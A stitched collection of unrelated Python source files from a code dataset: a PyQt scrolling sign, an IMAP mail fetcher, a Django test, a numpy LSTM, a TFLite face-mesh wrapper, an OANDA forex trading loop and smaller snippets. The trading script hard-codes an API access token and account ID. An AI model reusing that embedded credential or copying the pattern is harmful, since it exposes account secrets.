            while(-1):  # loop until self.stop is raised by the Off button
                for message in (db.fetch()):
                    self.label.setText(message[0])
                    print message[0]
                    window.write(message[0])
                    t1 = time.time()
                    # Scroll one column per step, pacing each step to 4/100 s.
                    for i in range( (window.width-96) ):
                        window.move(i)
                        # NOTE(review): if a step overruns, wait goes negative
                        # and time.sleep() raises ValueError.
                        wait = 4/100.0 - (time.time()-t1)
                        time.sleep(float(wait))
                        QtGui.QApplication.processEvents()
                        if self.stop:
                            break
                        print (time.time()-t1-4/100.0)*100
                        t1 = time.time()
                    if self.stop:
                        break
                time.sleep(1)
                if self.stop:
                    # Reset flags so the loop can be started again later.
                    self.stop = False
                    self.running=False
                    break
        # Dead code below: earlier fixed-message demo kept for reference.
        '''
        messages = ["Dine", "Alex","Corinne","Bernard"]
        while(-1):
        for message in messages:
        window.write(message)
        for i in range( 10 ):
        window.move(96)
        time.sleep(10/100.0/(i+1.0)/(i+1.0))
        QtGui.QApplication.processEvents()
        if self.stop:
        break
        if self.stop:
        break
        if self.stop:
        self.stop = False
        self.running=False
        break
        '''
|
996,653 | fbd2d974710072e52df10632a3269024c5b4656c | """@package tester
@brief Framework extension for Unittest.
@copyright Copyright (c) 2017 Marcel H
MIT License
Copyright (c) 2017 mh0401
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from ..utils import Traceable, Verbosity, assert_type, assert_cond, fullobjname, typename
# Import primitive module first
from .utils import PerfData, TestScenario, TestFailError
from .case import TestPackage, BaseTestCase, PerfTestCase
__all__ = ['TestScenario', 'TestFailError',
'BaseTestCase', 'PerfTestCase', 'TestPackage']
|
996,654 | 8ccf71ce180183ed0492b5303d58dc82a083ab58 | import math
# Estimate how many games fit in a season from three inputs.
# NOTE(review): 'year' is the literal string 'leap' for leap years; anything
# else is treated as a regular year -- confirm against the task statement.
year = input()
holidays = int(input())   # number of holidays in the season
weekends = int(input())   # weekends the player is away (out of 48)
# 3/4 of the remaining Saturdays host games.
saturday_games = (48 - weekends) * 3 / 4
# 2/3 of the holidays host games.
holiday_games = holidays * 2 / 3
total_games = saturday_games + holiday_games + weekends
if year == 'leap':
    # Leap years add a 15% bonus on top of the total.
    total_games += total_games * 0.15
print(math.floor(total_games))
996,655 | 1eec293476a3c91c3a237f3f4a19826a1790863c | import imaplib, email
class IMAPWrapper:
    """
    Class to connect to imap server login and extracting emails
    between two given dates (Python 2 code).
    """

    def __init__(self,username,password):
        # Connect over plain IMAP (port 143) and open the inbox.
        # NOTE(review): the bare except hides *any* failure (network error,
        # bad mailbox, ...) behind a "Wrong Password" message.
        try:
            self.mail=imaplib.IMAP4('imap.iitb.ac.in',143)
            self.mail.login(username,password)
            self.mail.select('inbox')
        except:
            print "Wrong Password"

    def get_mails(self,date1,date2):
        """Return [from, subject, body] triples for mails addressed to
        events@iitb.ac.in received SINCE date1 and BEFORE date2
        (IMAP date strings such as '1-Aug-2012')."""
        msgs=[]
        query = '(SINCE ' + date1 + ' BEFORE ' + date2 + ' TO "events@iitb.ac.in" )'
        typ,data=self.mail.search(None,query)
        for num in data[0].split():
            msg=self.mail.fetch(num,'(RFC822)')
            msg=email.message_from_string(msg[1][0][1])
            body=""
            for part in msg.walk():
                # Keep the last text/plain part as the message body.
                if part.get_content_type() == 'text/plain':
                    body="\n" + part.get_payload() + "\n"
            msgs.append([msg['From'],msg['Subject'],body])
        return msgs
if __name__=="__main__":
    # Manual smoke test: prompt for credentials, fetch a fixed date window
    # and dump the first matching message.
    username=raw_input("Username: ")
    password=raw_input("Password: ")
    date1="1-Aug-2012"
    date2="15-Aug-2012"
    acc = IMAPWrapper(username,password)
    msgs=acc.get_mails(date1,date2)
    print msgs[0]
|
996,656 | 7d1673db172b4e80931d8b13f02abb7b0537946c | from django.test import TestCase, SimpleTestCase
from .models import CustomUser
from django.urls import reverse
from .forms import CustomUserChangeForm
# Create your tests here.
class UserModelCreationlTest(TestCase):
    """Verify that CustomUser persists its basic profile fields."""

    def setUp(self):
        # One fixture user per test; TestCase rolls the DB back afterwards.
        CustomUser.objects.create(
            username='test_user',
            full_name='John Smith',
            address1='123 Test Terrace',
            address2='Suite 203',
            city='Dallas',
        )

    def test_user_fields(self):
        # NOTE(review): looking the row up by id=1 assumes a fresh test DB;
        # get(username='test_user') would be sturdier.
        user = CustomUser.objects.get(id=1)
        expected_user_name = f'{user.username}'
        expected_full_name = f'{user.full_name}'
        expected_address1 = f'{user.address1}'
        expected_address2 = f'{user.address2}'
        expected_city = f'{user.city}'
        self.assertEqual(expected_user_name, 'test_user')
        self.assertEqual(expected_full_name, 'John Smith')
        self.assertEqual(expected_address1, '123 Test Terrace')
        self.assertEqual(expected_address2, 'Suite 203')
        self.assertEqual(expected_city, 'Dallas')
|
996,657 | 1e899668107087045b0890a8cf8f70f27cb696af | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Oct 23rd 2018
@author: lucagaegauf
Single epoch of LSTM
LSTM structure ----------------------------------------------------------------
Input Layer (x): 1 node
LSTM (h, c): 3 hidden states
- Forget, input, and output gates: sigmoid activated
- Hidden and cell states: Tanh activated
ft = sigmoid(Uf * Xt + Wf * Ht-1 + bf)
it = sigmoid(Ui * Xt + Wi * Ht-1 + bi)
ot = sigmoid(Uo * Xt + Wo * Ht-1 + bo)
Ct = ft * Ct-1 + it * tanH(Uc * Xt + Wc * Ht-1 + bc)
Ht = ot * tanH(Ct)
Output Layer (y): 1 node (linear activation)
yt = identity(Vy * Ht + by)
Variable key ------------------------------------------------------------------
w: weight
b: bias
f: function
e: error
d: derivative
bpe: backpropagation error
t: time index
Sources -----------------------------------------------------------------------
http://colah.github.io/posts/2015-08-Understanding-LSTMs/
"""
#%%
import numpy as np
#%% RNN training params -------------------------------------------------------
n_hidden_state = 3 # Number of hidden states
#%% Helper functions ----------------------------------------------------------
def f_sigmoid(x):
    """Logistic sigmoid 1 / (1 + e^-x), applied elementwise."""
    denominator = 1 + np.exp(-x)
    return 1 / denominator
def f_dsigmoid(x):
    """Sigmoid derivative expressed in terms of its output x: x * (1 - x)."""
    return (1 - x) * x
def f_dtanh(x):
    """Tanh derivative expressed in terms of its output x: 1 - x^2."""
    squared = x ** 2
    return 1 - squared
def f_identity(x):
    """Identity (linear) activation used by the output layer."""
    return x
def f_didentity(x):
    """Derivative of the identity activation (constant 1)."""
    return 1
#%% Generate and process data -------------------------------------------------
data = np.array([11, 0, 5, 5, 16])
data_length = len(data)
print('The sequence is {} time steps.'.format(data_length))
# Normalize data
data_mean = np.mean(data, axis=0)
data_sd = np.std(data, axis=0, ddof=1)
data = np.around((data - data_mean) / data_sd, 2)
data
#%% Initialize RNN parameters -------------------------------------------------
# Weights
U_f = np.array([[-0.2], [ 0.4], [-1.0]])
W_f = np.array([[-0.4, -0.7, -0.8],
[ 0.1, -0.5, 0.8],
[ 0.9, 0.4, 0.2]])
U_i = np.array([[-0.2], [-0.1], [ 0.2]])
W_i = np.array([[ 0.0, 1.4, -0.5],
[ 0.2, -0.5, 0.3],
[ 0.1, -0.5, -0.9]])
U_o = np.array([[-0.1], [ 0.5], [-0.7]])
W_o = np.array([[ 0.4, -0.1, -0.3],
[-0.2, 0.2, 0.3],
[ 0.1, 0.1, 0.1]])
U_c = np.array([[ 0.3], [ 0.1], [ 0.4]])
W_c = np.array([[-0.3, -0.3, -0.8],
[ 0.1, -0.5, 0.2],
[-0.3, -0.7, -0.1]])
V_y = np.array([[-0.6, -0.6, -0.3]])
# Biases
b_f = np.array([[ 0.3], [ 1.2], [-0.4]])
b_i = np.array([[ 0.4], [-0.3], [ 0.8]])
b_o = np.array([[ 0.6], [ 0.1], [ 0.6]])
b_c = np.array([[ 0.0], [-0.2], [-0.9]])
b_y = np.array([[ 0.5]])
#%% LSTM forward pass ---------------------------------------------------------
loss_sum = 0
# One-step-ahead prediction: input x_t, target x_{t+1}.
inputs = data[:-1]
targets = data[1:]
seq_length = len(inputs)
# Hidden/cell state arrays carry one extra row for the initial state (t=0).
ht = np.zeros((seq_length + 1, n_hidden_state))
ct = np.zeros((seq_length + 1, n_hidden_state))
ft = np.zeros((seq_length, n_hidden_state))
it = np.zeros((seq_length, n_hidden_state))
ot = np.zeros((seq_length, n_hidden_state))
# Initialize hidden and cell states (fixed values for reproducibility).
ht[0,:], ct[0,:] = np.array([1., 2., 3.]), np.array([1., 2., 3.])
yt = np.zeros((seq_length, 1))
xt = np.zeros((seq_length, 1))
loss = np.zeros((seq_length, 1))
for t in range(len(inputs)):
    xt[t] = inputs[t]
    # Gate activations (sigmoid): forget, input, output -- see header formulas.
    ft[t,:] = f_sigmoid(U_f.T * xt[t] + np.dot(W_f.T, ht[t,:]) + b_f.T)
    it[t,:] = f_sigmoid(U_i.T * xt[t] + np.dot(W_i.T, ht[t,:]) + b_i.T)
    ot[t,:] = f_sigmoid(U_o.T * xt[t] + np.dot(W_o.T, ht[t,:]) + b_o.T)
    # New cell state: keep ft of the old state, add it of the tanh candidate.
    ct[t+1,:] = ft[t,:] * ct[t,:] + it[t,:] * np.tanh(U_c.T * xt[t,:] + np.dot(W_c.T, ht[t,:]) + b_c.T)
    ht[t+1,:] = ot[t,:] * np.tanh(ct[t+1,:])
    yt[t] = f_identity(np.dot(V_y, ht[t+1,:]) + b_y) # RNN output node
    loss[t] = 0.5 * np.square(yt[t] - targets[t]) # output loss (squared error)
    loss_sum += loss[t] / seq_length
#%%
print(np.around(ft, 2))
print(np.around(it, 2))
print(np.around(ot, 2))
print(np.around(ht, 2))
print(np.around(ct, 2))
|
996,658 | e4e9a7a51d642ee79f6d50cb0a9e044d016baa1b | import numpy as np
import cv2
import tensorflow as tf
class FaceMesh(object):
    """TFLite wrapper around a face-landmark model producing 468 3D points."""

    def __init__(self, model_path):
        self.num_coords = 468   # number of facial landmarks the model emits
        self.x_scale = 192      # model input width
        self.y_scale = 192      # model input height
        self.interpreter = tf.lite.Interpreter(model_path=model_path)
        self.interpreter.allocate_tensors()
        self.input_details = self.interpreter.get_input_details()
        self.output_details = self.interpreter.get_output_details()
        self.input_shape = self.input_details[0]['shape']

    def predict_on_image(self, img):
        """Return (landmarks, confidences); landmarks is (468, 3) with x/y
        rescaled to the raw image's pixels (z left in model units)."""
        # Resize to the model input and normalize pixels to [-1, 1].
        raw_shape = img.shape[:2]
        image = cv2.resize(img, (self.x_scale, self.y_scale)).reshape(tuple(self.input_shape)).astype(np.float32)/127.5-1.0
        # Run inference.
        self.interpreter.set_tensor(self.input_details[0]['index'], image)
        self.interpreter.invoke()
        regression_out = self.interpreter.get_tensor(self.output_details[0]['index'])
        confidences_out = self.interpreter.get_tensor(self.output_details[1]['index'])
        # Reshape to (468, 3) and map x/y back to the original resolution.
        regression_out = regression_out.reshape(-1,3)
        regression_out[:,0] *= raw_shape[1]/self.x_scale
        regression_out[:,1] *= raw_shape[0]/self.y_scale
        return regression_out, confidences_out.reshape(-1)
if __name__ == "__main__":
    import matplotlib.pyplot as plt
    # Demo: run the mesh on a sample image and plot the landmark points.
    raw_image = cv2.imread("images/face.jpg")
    image = cv2.cvtColor(raw_image, cv2.COLOR_BGR2RGB)
    model_path = "models/face_landmark.tflite"
    mesh_maker = FaceMesh(model_path)
    result, confidences = mesh_maker.predict_on_image(image)
    for xyz in result:
        # NOTE(review): xyz holds floats; newer OpenCV releases require
        # integer circle centers -- may need int(round(...)) here.
        cv2.circle(image, (xyz[0], xyz[1]), 3, (0, 255, 0), thickness=-1)
    plt.imshow(image)
    plt.show()
|
996,659 | 2ca613357bb5166b2efc06ee9a4cdf8127d5734a | #!/usr/bin/env python3
from locale import getpreferredencoding
from sys import stderr
# Report the platform's preferred text encoding on stderr, then emit a
# non-ASCII character to both streams as a quick encoding sanity check.
print("locale:", getpreferredencoding(do_setlocale=True), file=stderr)
print('…', file=stderr)
print('…')
|
996,660 | 688d92a2df25959c6eee5bbaa7e92568232b5b4e | from .confronta_estoque import *
from .estoque_na_data import *
from .executa_ajuste import *
from .edita_estoque import *
from .index import *
from .item_no_tempo import *
from .lista_docs_mov import *
from .lista_movs import *
from .mostra_estoque import *
from .movimenta import *
from .posicao_estoque import *
from .referencia_deposito import *
from .refs_com_movimento import *
from .transferencia import *
from .valor_mp import *
|
996,661 | 1e75167a475921d2f1e00dbc8e574ea990dd2606 | import requests
from bs4 import BeautifulSoup
# Download one specific image from the Wikipedia article on the Seoul
# Metropolitan Subway, located by its alt text.
url = "https://en.wikipedia.org/wiki/Seoul_Metropolitan_Subway"
resp = requests.get(url)
html_src = resp.text
soup = BeautifulSoup(html_src, 'html.parser')
target_img = soup.find(name='img', attrs={'alt':'Seoul-Metro-2004-20070722.jpg'})
print('HTML 요소: ', target_img)   # prints the matched <img> element
print("\n")
target_img_src = target_img.get('src')
print('이미지 파일 경로: ', target_img_src)   # prints the image path
print("\n")
# The src is protocol-relative ("//upload..."), so prefix a scheme.
target_img_resp = requests.get('http:' + target_img_src)
out_file_path = "./output/download_image.jpg"
with open(out_file_path, 'wb') as out_file:
    out_file.write(target_img_resp.content)
print("이미지 파일로 저장하였습니다.")   # "saved as an image file"
|
996,662 | 32220214d199a4a73096cadc7a03190e17df4c12 | def find_digit(a):
def find_digit(a):
    """Print how many digits of the number (given as string a) evenly divide
    the number itself (Python 2 code); zero digits are skipped."""
    count=0
    a_int=int(a)
    a_list=[]
    for i in range(len(a)):
        a_list.append(int(a[i]))
    for j in range(len(a_list)):
        try:
            if a_int%a_list[j]==0:
                count+=1
            else:
                continue
        except ZeroDivisionError:
            # A 0 digit can never divide the number; ignore it.
            continue
    print count
# Read the number of test cases, then one number (kept as a string) per line.
loop = int(raw_input())
for m in range(loop):
    a = raw_input()
    find_digit(a)
|
996,663 | 8ace9c931a9cf2cfdae114e2b37b41c0b412ee52 | from ExtraccionDatosOanda import ExtraccionOanda
from analisis_y_estrategia import analisis_y_estrategia
from multiprocessing import Process, Array
from ExtraccionDatos10s import extraccion_10s_continua
from ContadorEstrategia import ContadorEstrategias
from SeguimientoRangos import SeguimientoRangos
import time
import pandas as pd
import oandapyV20
import oandapyV20.endpoints.pricing as pricing
class dinero_invertido:
    """Mutable holder for the invested amount, shared between the strategy
    loop and the 10-second data-extraction process."""

    def __init__(self, monto):
        self.monto = monto
def calcular_rango_sop_res(ohlc, rango_velas):
    """Compute support/resistance levels over the last `rango_velas` candles.

    ohlc: DataFrame with columns 'o', 'h', 'l', 'c' (open/high/low/close).
    Returns (major resistance, minor resistance, minor support, major support).
    """
    # Rolling extremes over the window: wick highs/lows give the major levels,
    # closes give the first estimate of the minor levels.
    resistencia_mayor = ohlc["h"].rolling(rango_velas).max().dropna()
    resistencia_menor = ohlc["c"].rolling(rango_velas).max().dropna()
    soporte_menor = ohlc["l"].rolling(rango_velas).min().dropna()
    soporte_mayor = ohlc["c"].rolling(rango_velas).min().dropna()
    resistencia_punto_mayor = resistencia_mayor.iloc[-1]
    resistencia_punto_menor = resistencia_menor.iloc[-1]
    # Refine the minor resistance: for candles whose wick pierced the level,
    # move it to the candle's body edge (close or open) below it.
    for data in range(-rango_velas, 0):
        precio_h = ohlc['h'].iloc[data]
        precio_o = ohlc['o'].iloc[data]
        precio_c = ohlc['c'].iloc[data]
        if precio_h > resistencia_punto_menor > precio_c:
            if precio_c >= precio_o:
                resistencia_punto_menor = precio_c
            elif precio_c < precio_o < resistencia_punto_menor:
                resistencia_punto_menor = precio_o
    soporte_punto_menor = soporte_menor.iloc[-1]
    soporte_punto_mayor = soporte_mayor.iloc[-1]
    # Mirror-image refinement for the major support using lower wicks.
    for data in range(-rango_velas, 0):
        precio_l = ohlc['l'].iloc[data]
        precio_o = ohlc['o'].iloc[data]
        precio_c = ohlc['c'].iloc[data]
        if precio_l < soporte_punto_mayor < precio_c:
            if precio_c <= precio_o:
                soporte_punto_mayor = precio_c
            elif precio_c > precio_o > soporte_punto_mayor:
                soporte_punto_mayor = precio_o
    return resistencia_punto_mayor, resistencia_punto_menor, soporte_punto_menor, soporte_punto_mayor
def run(tiempo_de_ejecucion_minutos, primera_divisa, segunda_divisa, numero_noticias,
        horas_noticias, monto):
    """Run the live trading loop for one currency pair.

    tiempo_de_ejecucion_minutos: total running time, in minutes.
    primera_divisa, segunda_divisa: currency codes, e.g. 'EUR'/'USD' -> 'EUR_USD'.
    numero_noticias: how many entries of horas_noticias are meaningful (0-3).
    horas_noticias: tuple of 'YYYY-MM-DD HH:MM' strings; the loop pauses for
        30 minutes when the wall clock matches one (news blackout).
    monto: amount of money available to invest.

    Side effects: spawns the 10-second extraction process, refreshes the
    candle CSVs, and calls analisis_y_estrategia() roughly every 10 seconds.
    """

    def _ahora(parte=None):
        # Current local time 'YYYY-MM-DD HH:MM:SS', optionally sliced.
        stamp = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
        return stamp if parte is None else stamp[parte]

    print("comenzando")
    monto = dinero_invertido(monto)
    contador_est = ContadorEstrategias()
    objeto_rango = SeguimientoRangos()
    timeout = time.time() + (tiempo_de_ejecucion_minutos * 60)
    divisa = f"{primera_divisa}_{segunda_divisa}"
    client = oandapyV20.API(access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
                            environment="practice")
    live_price_request = pricing.PricingInfo(accountID="101-011-12930479-001", params={"instruments": divisa})
    # Seed the candle CSVs for the three timeframes used by the strategy.
    ExtraccionOanda(client, 500, 'M1', divisa)
    ExtraccionOanda(client, 500, 'M5', divisa)
    ExtraccionOanda(client, 500, 'M30', divisa)
    # Background process that keeps datos_10s.csv up to date.
    proceso_10s = Process(target=extraccion_10s_continua, args=(divisa, timeout, objeto_rango, monto))
    proceso_10s.start()
    time.sleep(30)
    datos_1min = pd.read_csv("datos_M1.csv", index_col="time")
    # Support/resistance on 1-minute candles over a 120-candle window.
    resistencia_punto_mayor_1m, resistencia_punto_menor_1m, soporte_punto_menor_1m, soporte_punto_mayor_1m = \
        calcular_rango_sop_res(datos_1min, 120)
    datos_5min = pd.read_csv("datos_M5.csv", index_col="time")
    # Support/resistance on 5-minute candles over a 50-candle window.
    resistencia_punto_mayor_5m, resistencia_punto_menor_5m, soporte_punto_menor_5m, soporte_punto_mayor_5m = \
        calcular_rango_sop_res(datos_5min, 50)
    datos_30min = pd.read_csv("datos_M30.csv", index_col="time")
    # Support/resistance on 30-minute candles over a 50-candle window.
    resistencia_punto_mayor_30m, resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m = \
        calcular_rango_sop_res(datos_30min, 50)
    while time.time() <= timeout:
        try:
            # News blackout: sleep 30 minutes when a scheduled time arrives.
            # (Replaces the original numero_noticias == 1/2/3 if-chain.)
            for hora_noticia in horas_noticias[:numero_noticias]:
                if _ahora(slice(None, -3)) == hora_noticia:
                    time.sleep(1800)
                    break
            # Refresh 1-minute candles once per minute (the CSV's last candle
            # is no longer the previous minute).
            if f"{(int(_ahora(slice(14, 16))) - 1):02}" != datos_1min.iloc[-1].name[14:16]:
                try:
                    ExtraccionOanda(client, 500, 'M1', divisa)
                except Exception as e:
                    # Recreate the API client on transient request failures.
                    print(f"excepcion {e}: {type(e)}")
                    client = oandapyV20.API(
                        access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
                        environment="practice")
                datos_1min = pd.read_csv("datos_M1.csv", index_col="time")
                resistencia_punto_mayor_1m, resistencia_punto_menor_1m, soporte_punto_menor_1m, soporte_punto_mayor_1m = \
                    calcular_rango_sop_res(datos_1min, 120)
            # Refresh 5-minute candles when the minute ends in 1 or 6 (just
            # after a 5-minute candle closes).
            if (int(_ahora(slice(15, 16))) == 1 or int(_ahora(slice(15, 16))) == 6) and \
                    (datos_5min.iloc[-1].name[14:16] != f"{int(_ahora(slice(14, 16))) - 1:02}"):
                try:
                    ExtraccionOanda(client, 500, 'M5', divisa)
                except Exception as e:
                    print(f"excepcion {e}: {type(e)}")
                    client = oandapyV20.API(
                        access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
                        environment="practice")
                datos_5min = pd.read_csv("datos_M5.csv", index_col="time")
                resistencia_punto_mayor_5m, resistencia_punto_menor_5m, soporte_punto_menor_5m, soporte_punto_mayor_5m = \
                    calcular_rango_sop_res(datos_5min, 50)
            # Refresh 30-minute candles at minutes 31 and 01.
            # BUG FIX: the original parenthesization evaluated
            # ``(minute == 31 or minute_str) == "01"``, so the refresh never
            # fired at minute 31; the intended grouping is restored here.
            minuto_actual = _ahora(slice(14, 16))
            if (int(minuto_actual) == 31 or minuto_actual == "01") and \
                    (datos_30min.iloc[-1].name[14:16] != f"{int(minuto_actual) - 1:02}"):
                try:
                    ExtraccionOanda(client, 500, 'M30', divisa)
                except Exception as e:
                    print(f"excepcion {e}: {type(e)}")
                    client = oandapyV20.API(
                        access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
                        environment="practice")
                datos_30min = pd.read_csv("datos_M30.csv", index_col="time")
                resistencia_punto_mayor_30m, resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m = \
                    calcular_rango_sop_res(datos_30min, 50)
            datos_10s = pd.read_csv("datos_10s.csv", index_col="time")
        except Exception as e:
            # NOTE(review): if the very first iteration fails, datos_10s is
            # undefined and the call below raises NameError (as in the
            # original); later failures reuse the previous datos_10s.
            print(f"excepcion {e}: {type(e)}")
            print("hubo error en lectura de datos csv")
        analisis_y_estrategia(datos_10s, datos_1min, datos_5min, datos_30min, divisa, resistencia_punto_mayor_1m,
                              resistencia_punto_menor_1m, resistencia_punto_mayor_5m,
                              resistencia_punto_menor_5m, soporte_punto_menor_1m, soporte_punto_mayor_1m,
                              soporte_punto_menor_5m, soporte_punto_mayor_5m, resistencia_punto_mayor_30m,
                              resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m,
                              monto, client, live_price_request, contador_est)
        time.sleep(10)
if __name__ == "__main__":
    # Interactive session configuration: instrument, money, start time and
    # up to three scheduled news blackouts.
    primera_divisa = input("introduzca la primera divisa: ")
    segunda_divisa = input("introduzca la segunda divisa: ")
    monto = input("introduzca el monto a invertir: ")
    mes = input("introduzca el mes de inicio: ")
    dia = input("introduzca el dia de inicio: ")
    hora = input("introduzca la hora de inicio (militar): ")
    minuto = input("introduzca el minuto de inicio: ")
    tiempo = int(input("introduzca el tiempo de ejecucion en minutos: "))
    numero_noticias = int(input("Introduzca el numero de noticias: "))
    noticia1 = 0
    noticia2 = 0
    noticia3 = 0
    if numero_noticias == 0:
        pass
    elif numero_noticias == 1:
        hora_noticia = input("Introduzca la hora de la noticia 15 minutos antes: ")
        minuto_noticia = input("Introduzca el minuto de la noticia 15 minutos antes: ")
        noticia1 = f'2020-{mes}-{dia} {hora_noticia}:{minuto_noticia}'
    elif numero_noticias == 2:
        hora_noticia1 = input("Introduzca la hora de la primera noticia 15 minutos antes: ")
        minuto_noticia1 = input("Introduzca el minuto de la primera noticia 15 minutos antes: ")
        noticia1 = f'2020-{mes}-{dia} {hora_noticia1}:{minuto_noticia1}'
        hora_noticia2 = input("Introduzca la hora de la segunda noticia 15 minutos antes: ")
        minuto_noticia2 = input("Introduzca el minuto de la segunda noticia 15 minutos antes: ")
        noticia2 = f'2020-{mes}-{dia} {hora_noticia2}:{minuto_noticia2}'
    elif numero_noticias == 3:
        hora_noticia1 = input("Introduzca la hora de la primera noticia 15 minutos antes: ")
        minuto_noticia1 = input("Introduzca el minuto de la noticia 15 minutos antes: ")
        noticia1 = f'2020-{mes}-{dia} {hora_noticia1}:{minuto_noticia1}'
        hora_noticia2 = input("Introduzca la hora de la segunda noticia 15 minutos antes: ")
        minuto_noticia2 = input("Introduzca el minuto de la segunda noticia 15 minutos antes: ")
        noticia2 = f'2020-{mes}-{dia} {hora_noticia2}:{minuto_noticia2}'
        hora_noticia3 = input("Introduzca la hora de la tercera noticia 15 minutos antes: ")
        minuto_noticia3 = input("Introduzca el minuto de la tercera noticia 15 minutos antes: ")
        # BUG FIX: the original built noticia3 from hora_noticia1 and
        # minuto_noticia1, silently discarding the third news time.
        noticia3 = f'2020-{mes}-{dia} {hora_noticia3}:{minuto_noticia3}'
    # Busy-wait until the configured start second, then launch the session.
    # NOTE(review): hard-codes year 2020 and burns CPU while waiting.
    while time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) != f'2020-{mes}-{dia} {hora}:{minuto}:00':
        pass
    run(tiempo, primera_divisa, segunda_divisa, numero_noticias, (noticia1, noticia2, noticia3), monto)
|
996,664 | 073ec1ba7edd68ea713a7adcbe29a5cae62cb873 | import utility
import helper
import pickle
import numpy as np
def load_datasets(path, filenames):
    """Load the feature and label arrays stored at path + filenames[0] and
    path + filenames[1]; returns them as an (X, Y) tuple."""
    features_file, labels_file = filenames[0], filenames[1]
    features = np.load(path + features_file)
    labels = np.load(path + labels_file)
    return (features, labels)
def test(filename):
    """Load pickled weights from `filename`, rebuild the model via the
    project's utility/helper modules, and print MNIST test predictions
    plus overall accuracy."""
    # The pickle holds a dict with a 'weights' entry (nested lists).
    fp = open(filename, 'rb')
    data = pickle.load(fp)
    fp.close()
    weights = data.get('weights')
    weights = helper.lists_toarray(weights)
    model = utility.getNewModel()
    model.set_weights(weights)
    X, Y = load_datasets(
        "../",
        ["mnist-test-images.npy", "mnist-test-labels.npy"]
    )
    pred = utility.predict(model, X)
    print(np.argmax(pred, axis=1), Y)
    # Fraction of samples whose argmax prediction matches the label.
    print(sum(np.argmax(pred, axis=1) == Y) / Y.shape[0])
if __name__ == "__main__":
test('model')
|
996,665 | 428c989911121f9a1487d29313a57eff4bb21d7a | def add(a, b):
def add(a, b):
    """Return a + b, echoing the operands and result (Python 2 code)."""
    print "Passed a=%s and b=%s, returning a+b=%s" % (a,b,a+b)
    return a + b
|
996,666 | fcec9a84465f521b8b9faeabf794cd88b3ce1907 | #!/usr/bin/env python3
string = input('Digite uma string: ')
def eh_minuscula1(original):
    """Accept only strings where every character is a lowercase letter
    (accented letters included); the empty string passes."""
    return all(ch.islower() for ch in original)
def eh_minuscula2(original):
    """Return True when lowercasing leaves the string unchanged, i.e. it has
    no uppercase letters (digits, punctuation, etc. are allowed).

    Bug fix: the original lowercased the module-level ``string`` variable
    instead of the ``original`` parameter, so the result ignored its input.
    """
    convertida = original.lower()
    return original == convertida
def eh_minuscula3(original):
    """Accept only unaccented ASCII lowercase letters a-z; empty passes."""
    import string
    permitidas = set(string.ascii_lowercase)  # 'abcdefghijklmnopqrstuvwxyz'
    return all(ch in permitidas for ch in original)
print('A string', 'é' if eh_minuscula1(string) else 'não é', 'toda minúscula')
|
996,667 | ed36b490b0d637d23d806b09bdde42e9b9d92d19 | from collections import UserDict
from numbers import Integral
class CellSpace(UserDict):
    """ CellSpace adds 2D slicing and bounds information to dicts of (x,y) coordinate pairs.
    Notes: CellSpace does not support assigning by slice at this point.
    Height and width are not absolute measures of how many cells CellSpace contains in
    either direction. Instead they show the max labeled cell, this can be considered
    either a bug or a feature. Max labeled cell in this case means the cell with the
    largest index in that direction (height or width).
    """

    def __init__(self, *args, **kwargs):
        # Bounds start at 1x1 and grow as coordinate keys are assigned.
        self.width = 1
        self.height = 1
        super().__init__(*args, **kwargs)

    def __setitem__(self, key, item):
        """Store item; grow width/height when key is an (x, y) pair."""
        self.data[key] = item
        # NOTE(review): `set` in this isinstance check is dead -- a set is
        # unhashable and would already have failed as a dict key above.
        if isinstance(key,(tuple,list,set)):
            if key[0] >= self.width:
                self.width = key[0] + 1
            if key[1] >= self.height:
                self.height = key[1] + 1

    def __getitem__(self, index):
        """Support [x, y] cell access, [xs:xe, ys:ye] box, [xs:xe, y] row and
        [x, ys:ye] column access; slice forms return a new re-indexed CellSpace."""
        cls = type(self)
        new_cells = cls()
        width = self.width
        height = self.height
        try:
            # Cell case: both items are integers -> direct lookup.  A slice in
            # the tuple makes the key unhashable, raising TypeError below.
            return self.data[(index[0], index[1])]
        except TypeError:
            if isinstance(index, tuple) and isinstance(index[0], slice) and isinstance(index[1],
                slice):
                # Box case: both items are slices.
                x_s = index[0].indices(width) # indices returns a (start, stop, stride) tuple
                y_s = index[1].indices(height)
                for y_index, y in enumerate(range(*y_s)):
                    for x_index, x in enumerate(range(*x_s)):
                        new_cells[(x_index, y_index)] = self.data[(x, y)]
                return new_cells
            elif isinstance(index, tuple) and isinstance(index[0], slice) and isinstance(index[1], Integral):
                # Row case: x is a slice, y is an integer [int:int, int].
                x_s = index[0].indices(width)
                for x_index, x in enumerate(range(*x_s)):
                    new_cells[(x_index, 0)] = self.data[(x, index[1])]
                return new_cells
            elif isinstance(index, tuple) and isinstance(index[0], Integral) and isinstance(index[1], slice):
                # Column case: x is an integer, y is a slice [int, int:int].
                y_s = index[1].indices(height)
